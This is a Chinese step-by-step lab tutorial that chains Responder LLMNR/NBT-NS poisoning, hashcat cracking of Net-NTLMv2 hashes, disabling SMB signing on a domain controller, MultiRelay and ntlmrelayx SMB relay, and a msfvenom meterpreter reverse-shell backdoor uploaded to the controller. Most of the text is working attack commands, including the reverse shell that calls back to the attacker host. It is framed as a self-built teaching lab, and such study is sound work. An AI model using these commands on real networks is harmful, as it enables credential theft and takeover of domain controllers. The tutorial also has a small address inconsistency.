SMB中继+Responder NTLM捕获实验分步教程
前置说明:本实验仅在自建教学域环境操作,严禁对公网/陌生设备使用;实验只会抓取本机认证哈希、远程创建测试文件夹,不删改系统文件、不窃取真实数据。
环境IP示例:
Kali:192.168.1.128
Win7:192.168.1.11(普通域成员,administrator域账号登录)
Win2012:192.168.1.10(域控)
任务1:Responder抓取Win7 Net-NTLMv2 Hash
启动Responder
responder -I eth0 -wrf参数说明:-I 指定网卡;-w开启WPAD劫持,-r/-f开启SMB/NetBIOS应答
Win7端触发请求:Win7打开此电脑,地址栏输入
\\KALIIP(\192.168.1.100),回车回到Kali,Responder控制台自动打印捕获到的administrator的Net-NTLMv2哈希,复制整串哈希保存到
hash.txt


任务2:hashcat爆破NTLM哈希
准备密码字典(常用
rockyou.txt,kali自带),解压字典:
gunzip /usr/share/wordlists/rockyou.txt.gz
hashcat爆破命令(NTLMv2哈希模式:5600)
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
破解成功会显示明文密码(实验需要爆破不出来可以自己手动把自己的密码添加到rockyou字典里面)


爆破出来密码是Admin12345@
任务3:Win2012域控关闭SMB签名(中继必要配置)


灰色无法修改
原因
域控加入AD域后,域组策略优先覆盖本地组策略,本地gpedit选项灰化无法修改,需要去域组策略管理器关闭SMB强制签名。
步骤1:打开域组策略管理器
开始菜单→组策略管理(GPMC.msc)
找到你的域(LYH)→右键Default Domain Policy → 编辑
步骤2:修改两处SMB签名配置
路径:计算机配置→Windows设置→安全设置→本地策略→安全选项
Microsoft网络服务器: 对通信进行数字签名(始终) → 禁用
Microsoft网络客户端: 对通信进行数字签名(始终) → 禁用


步骤3:刷新组策略生效
域控CMD执行:
gpupdate /force
等待策略刷新完毕,本地组策略就不再灰色锁定。
补充小提示
改完之后才能正常做SMB中继,两个签名项全都要禁用,只改一个中继依然失败。
SMB签名开启会拦截NTLM中继,实验必须临时关闭,实验结束可复原
Win2012打开
gpedit.msc组策略编辑器计算机配置→Windows设置→安全设置→本地策略→安全选项
找到「Microsoft网络客户端:对通信进行数字签名(始终)」→禁用
找到「Microsoft网络服务器:对通信进行数字签名(始终)」→禁用
CMD刷新组策略:
gpupdate /force


任务4:MultiRelayx NTLM中继:劫持Win7凭据→横向拿下Win2012(域控)
环境:
攻击机Kali:
192.168.1.128受害者Win7:客户端
目标Win2012域控:
192.168.1.10
前提:Win2012关闭SMB签名(开签名中继失效,你之前踩过坑)
1:配置Responder关闭SMB、HTTP(MultiRelay独占445)
sed -i 's/SMB = On/SMB = Off/g' /usr/share/responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' /usr/share/responder/Responder.conf
2:启动MultiRelayx中继脚本(指定目标域控IP)
python3 /usr/share/responder/tools/MultiRelay.py -t 192.168.1.10 -u ALL
-t:中继转发目标(Win2012域控)-u ALL:抓到凭据自动尝试登录目标


3:新开终端启动Responder投毒(LLMNR/NBT-NS欺骗Win7)
responder -I eth0 -w


4:Win7客户端操作
此电脑→地址栏输入\\随便乱输域名(触发LLMNR查询,被Kali投毒)




MultiRelay自动抓取Win7的NTLM哈希,直接中继转发到192.168.1.10,成功则弹出域控CMD,直接拿到权限。
关键:域控SMB强制开启签名=中继失败,只能改用实验5木马上线。
任务5:msfvenom生成后门并利用smbrelayx.py对winServer2012进行中继攻击上传木马,→MSF监听拿域控shell
1、Kali生成Windows反弹木马(x64,反弹IP=你的kali)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=443 -f exe > backdoor.exe


2、MSF开启监听(新开终端)
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.128
set LPORT 443
run
保持窗口挂起等待上线。


3、ntlmrelayx(smbrelayx的新版)
# SMB中继传马写法(替代smbrelayx)
impacket-ntlmrelayx -t smb://192.168.1.10 -smb2support -e /home/kali/Desktop/new.exe


当前状态:ntlmrelayx已经成功启动(只剩WinRM端口报错,SMB:445、HTTP:80正常监听,不影响本次SMB中继实验,不用重开工具)
4、直接去Win7客户端执行触发命令
net use \\192.168.1.128\test


触发LLMNR解析 → 抓取NTLM哈希 → ntlmrelayx自动中继192.168.1.10、上传+运行new.exe → MSF自动弹出meterpreter会话,实验5完成。
impacket-ntlmrelayx -t smb://192.168.1.10 --smb2support -e /home/kali/Desktop/new.exe --no-winrm-server --no-wcf-server --no-rpc-server
